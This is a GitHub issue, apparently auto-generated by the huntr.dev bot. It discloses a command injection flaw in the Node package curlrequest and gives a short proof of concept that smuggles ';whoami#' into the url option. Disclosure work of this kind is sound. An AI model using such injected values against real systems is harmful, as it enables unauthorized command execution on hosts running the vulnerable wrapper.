Skip to content

Security Notice & Bug Bounty - Command Injection - huntr.dev #68

New issue
New issue
Open
Open
Security Notice & Bug Bounty - Command Injection - huntr.dev#68
@huntr-helper

Description

@huntr-helper
huntr-helper
opened on Jun 12, 2020

Overview

curlrequest is a curlrequest is a node wrapper for the command line curl.

Affected versions of this package are vulnerable to Command Injection. It is possible to inject arbitrary commands by using a semicolon char in any of the options values.

Proof of Concept

var curl = require("curlrequest");

let userPayload = ";whoami#";
curl.request({ url: userPayload, pretend: true }, function(err, stdout, meta) {
  console.log("%s %s", meta.cmd, meta.args.join(" "));
});

Bug Bounty

We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/

We will submit a pull request directly to your repository with the fix as soon as possible. Want to learn more? Go to https://github.com/418sec/huntr 📚

Automatically generated by @huntr-helper...

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions